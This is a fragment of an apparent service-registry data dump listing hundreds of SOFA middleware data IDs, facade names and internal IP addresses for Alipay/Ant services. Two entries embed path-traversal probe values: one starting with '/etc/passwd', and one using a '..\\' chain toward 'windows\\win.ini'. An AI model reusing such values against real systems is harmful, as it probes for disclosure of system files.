/etc/passwd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmng.common.spi.ControlBizFacade:1.0:commonReachConfig@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apyunqing.facade.AppVersionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.xfireMaxConnectionMosn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.126.23#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_MOBILEIC_MOBILEIC#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.personal.service.user.uncertifyfreeze.UncertifyFreezeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fctradecore.common.service.facade.api.BizOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditagreement.common.service.agreement.org.PcreditOrgAgreementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ALDATA#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.icrowdservice.facade.match.PromoMatchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.query.ZoneEnvQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.198#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finorm.core.service.guardian.CheckTaskCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbomp.common.service.facade.merchant.api.query.OmpRecruitBatchQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininflux.common.service.facade.mng.serial.OutfluxSerialNoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinsnsprod.service.facade.api.card.ProdCardFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.175.250#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.certifymng:name=com.alipay.common.webx.session.drm.SessionLogDrm.sessionDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openitemcore.common.service.facade.api.management.servicelibrary.ServiceOperationInfoMngConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudinc.common.service.facade.dispatch.DispatchConfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.client.AssetRemoteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.242.201#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.bioperation.service.facade.api.UserBehaviorGraphFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.ClearingAccountDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.141.247#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insiop.common.service.facade.module.InsIopPageMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:miniGameSubmitAuditEndManagerProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icfmng.common.service.facade.api.ReconChannelConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.dayutrprod.common.facade.inspect.AppFundamentalDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.cif.facade.PermissionQueryService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchProdPoiRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.diag.common.service.facade.AliyunKbFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:processmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.dataphin.tenant.client.biz.service.TenantLimitService:1.0:dpsecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alphasec.compass.operating.facade.service.OperatingService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lowercaseFirst:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.common.service.facade.variable.OpenVariableService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscheck.service.facade.api.DataSourceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.common.service.facade.eval.TextProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:clientsc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprodapicore.facade.manageapi.ReservedResultCodeManager:1.0:product@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.uemprod.common.service.facade.merchantinfo.DistrictInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:uctcep@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.OpAdviserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfas.facade.api.OmittedInwardManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.morderprod.common.service.facade.CacheManagerService:1.0.0:cacheManagerService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@instservicecore#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.promobench.common.service.facade.service.PlanAppendBudgetManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.alipay.server.demo.facade.SampleService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.common.service.user.contacts.ContactsManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.walle.service.facade.api.OssOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.findecision.common.service.integration.config.ServiceClientConfigResource.useNewZscaleSerivce,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.echannelcenter.common.service.facade.EchannelDataSupportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imaspmng.common.service.facade.MarketCampFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.common.service.integration.tbnotify.UniformEventClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.InterfaceBackGroundManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprodmngcore.facade.ProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.brand.BrandFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivecenter.common.service.facade.api.ClcAccessExtService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.openapi.ProdOpenTopicFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dayuarkbase.facade.ArkModuleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeco.facade.abnormalorder.AbnormalOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.12.96#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.insmobileTairCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:inslifecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.235.80#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.peerpayprod.senior.common.service.facade.family.api.FamilyMemberActionTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshyserver.common.service.facade.api.sop.SopRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.custview.facade.AlipayViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.167.222.205#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.fluxbatch.common.service.facade.FluxBatchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.168.56#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.common.service.facade.execute.HeartbeatCheck:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.enableDebug,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.41.202#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitymonicalc.common.service.facade.CalcServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.166.79#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.mybank.bksupplychainprod.common.service.facade.ticket.api.ScpTicketAccQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.escrowexprod.common.service.facade.EscrowBaseServiceFacade:1.0:dwuniontrade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.cfin.cffilefactory.facade.trigger.FileTriggerFacade:1.0:mlscfilefactory@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmerchantprod.common.service.workorder.api.InsWorkorderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.159.193.74#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insclaimdecision.common.service.InsAttachmentDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cif.facade.FundCardInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.tradequery.common.service.facade.TradeBaseQueryFacade:1.0:tradequeryhis@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.common.facade.mcop.mng.ServiceExecutorConfigManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.secuprod:name=com.alipay.secuprod.biz.fund.common.FundAIPConfig.supportedCycleConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.alcorporation.common.service.facade.api.AlCorpShareholderRelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.254.2#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sccore.facade.SwitchConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.variable.facade.VariableClient:1.0:ropservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileapp.biz.rpc.register.RegisterService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchainprod.common.facade.query.FeeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.AmTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@minicenter#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:csplatformMessageSendCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.RedEnvelopeShareFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rinsight.biz.customized.spi.DecisionLogSpi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.177.241#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antfeaturelib.common.facade.service.ScriptEvalServiceFacade:1.0:antsecurity_securityservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.common.service.facade.SubDomainRuleValidateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.zbdm.common.service.facade.phytable.TableSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.igmatrix.common.service.facade.PlatformDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.download.DownloadCenterCallbackInterface:1.0:deptAdjustDownloadCenterCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mrchiscore:name=com.alipay.mrchiscore.gray.uid.grayByPercent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.testCacheTbase.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudinc:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.242.193#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbadvert.biz.delivery.rpc.BrandBuyRpcService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicore.common.service.facade.rel.api.PluginUseManagementOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_processCapitalFreezeContinueCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.common.service.thirdparty.ThirdPartyManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.core.service.dailycut.api.TransInfoCheckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.tntInst.TntInstFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcp_easy_member_renew_remind@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dataprofiling.common.service.facade.MetricFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmonitor.CommonQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.imif.common.service.facade.v2.LabelCommonService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finfundprod.common.service.facade.UserSubscribeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.content.service.facade.AsynTaskSendManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.bankcardTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.jarvis.service.facade.api.common.GroupManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocommopt:name=com.alipay.promocommopt.common.drm.HeatDrmResource.hotHbaseCacheQueryExpireTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zcache:name=com.alipay.zdal.ldc.tair.idatacontextTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.56.234#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.merchant.common.test.facade.MerchantTestQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.246.38#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.linka:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInGlobalSwitchValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antreplay.service.mobilegw.ReplayGwFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bioperation.service.facade.api.UserActionVisibleFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.112.88#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.secucommunity.common.service.facade.forum.api.ForumRoleFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:zmepratingbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_G_MAIL_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cicadax.engine.common.facade.CicadaXDebugFacade:1.0:membercommon@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.DingtalkNoticeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_4003#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alibaba.einvoice.prod.facade.service.EinvoiceItemService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icif.service.facade.api.AuthorityCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.96.126#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.hyp.common.service.facade.highavailability.facade.ServerFileInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantContactWayFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finlinkdata.common.service.facade.account.accountrelation.service.AccountRelationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.43.155#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.csaccurate.service.facade.mng.api.FactorQueryService:1.0:rmaccurateService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FundGoldAssetProfitQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdchecker.service.analyze.facade.BlinkReportService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:bkdevops@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifecore.common.service.facade.genericdata.GenericBizDataOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-kaleido-compensate-task-Scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","frdspcore@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.finassetpreference.api.facade.FactorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_10.15.240.41#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.reservecenter.facade.api.AlipayAccountBalanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.msecuritycore.api.SecurityAdvicePolicyRzoneService:1.0:securitycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openexprod.common.service.facade.SpiConfigManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.back.CacheFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.0.48#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchiscore.common.service.facade.operation.OperationScheduleTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.article.NewsFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.common.service.facade.EmailBatchRegistService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhcprod.core.service.CollectionActivityCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insleads.common.service.facade.InsleadsCicadaDataFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscc.common.service.facade.service.credit.AgdsccPCSpecificCreditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundbankcore.common.service.facade.FundBankCustodyTransferInFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_CURE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.itestmng.common.service.facade.api.TestLogService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.95.219#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.crmhome.common.service.facade.api.equipment.EquipmentFundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.msfluxconf:name=com.alipay.fc.fluxconf.fluxconfClient.drm.CtrlDataResource.compareCache,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mmemberprod.backend.service.facade.MerchantMemberTemplateSupportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.bankcardTairCache_dest.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcloaninsight.common.service.facade.service.FeatureConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.instasset:name=com.alipay.instasset.client.DrmResource.dump,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfocore.common.service.facade.cds.mng.ProductPoolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zcache.global.grayElastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_192.168.1.3#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finscprod.facade.ssm.SignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.120.20#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.lendpofprod:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkMvelBlackKeyWords,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.certify.service.facade.Certify2CvmFacade2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.DomainQueryFacade:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accreditcore.common.service.facade.StopInstanceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alibaba.drc.rm.endpoint.openapi.TaskOpenApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.88.61.14#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.pricecenter.common.service.facade.api.price.PriceQueryStdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.assettrans.facade.sfa.api.SfatransAsyncTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csconfig.service.facade.api.AppQueryService:1.0:merchantService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.productcenter.common.service.facade.ProductBillingCoreFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Sub_Servers_TP_POLYMER_APPLY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.test.base.callback.SayHelloService:1.0:uniqueId@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-promoplaycenter-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:openmonitor_ats_guaranteeMerchantGetImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.insttrade.core.service.drm.AcsAccountDRM.instId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.infosec.content.service.facade.RiskAccumulateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.groupchat.api.GroupChatFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","bizrecon@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insqa.facade.autocase.BxAutoCaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.KoubeiOnlinePayService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_P_KEY_WORD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zdataquery.common.service.facade.lineage.LineageQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.166.38#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.gfinvoice.facade.invoice.InvoiceAcceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.app.AppApiQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimitnear:name=com.alipay.rule.core.engine.config.RuleEngineResource.isRecordRuleCostTimeStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.kwlib:name=com.alipay.zcache.log.kwlib.logLevel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.ap.bizprod.common.service.facade.api.ApbizMemberQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.opssla.common.service.facade.DrmManageFacade:1.0:ZAXHBXCN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.insure.v2.AutoComplianceFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.common.service.facade.sci.SciTestServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.247.199#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:serverlessbaseapp@DEFAULT#@#DEFAULT_INSTANCE